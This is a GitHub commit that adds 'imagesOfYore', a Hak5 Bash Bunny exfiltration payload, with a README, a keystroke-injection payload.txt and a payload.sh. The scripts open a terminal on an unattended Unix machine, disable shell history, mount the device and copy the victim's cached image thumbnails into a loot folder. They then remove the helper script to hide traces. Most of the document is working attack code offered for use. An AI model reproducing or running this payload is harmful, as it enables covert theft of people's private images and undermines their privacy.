uploaded imagesOfYore (hak5#510)

* uploaded imagesOfYore imagesOfYore payload steals every image that target ever had in his disk. * Delete payload.txt * uploading imagesOfYore
omern18 · Apr 8, 2022 · 46d069c · 46d069c
1 parent 55d3472
commit 46d069c
Show file tree

Hide file tree

Showing 3 changed files with 94 additions and 0 deletions.
diff --git a/payloads/library/exfiltration/imagesOfYore/README.md b/payloads/library/exfiltration/imagesOfYore/README.md
@@ -0,0 +1,38 @@
+## About:
+* Title: imagesOfYore
+* Description: imagesOfYore payload steals every image that target ever had in his disk.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltration
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage
+
+## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk.
+
+### Features:
+* Sotres all images(curently stored on disk and deleted too).
+* Extremly fast zstd compression for transfering images.
+
+### Payload Workflow:
+* Stop storing histroy.
+* Auto Mounting bunny.
+* Transfering payload script.
+* Executing script in background and disowning 
+* Unmounting bunny.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName               | Directory                     |
+| --------------         | ----------------------------- |
+| payload.txt            | /payloads/switch1/            |
+| imagesOfYore/          | /payloads/libray/             |
+
+### Note:
+* Create directory named `imagesOfYore` in `/loot/` for storing loot.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails
+udisksctl unmount -b /dev/$disk
+rm /tmp/script
diff --git a/payloads/library/exfiltration/imagesOfYore/payload.txt b/payloads/library/exfiltration/imagesOfYore/payload.txt
@@ -0,0 +1,47 @@
+# Title: imagesOfYore
+# Description: imagesOfYore payload steals every image that target ever had in his disk.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script
+Q ENTER
+Q STRING chmod +x /tmp/script
+Q ENTER
+Q STRING /tmp/./script \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
+LED FINISH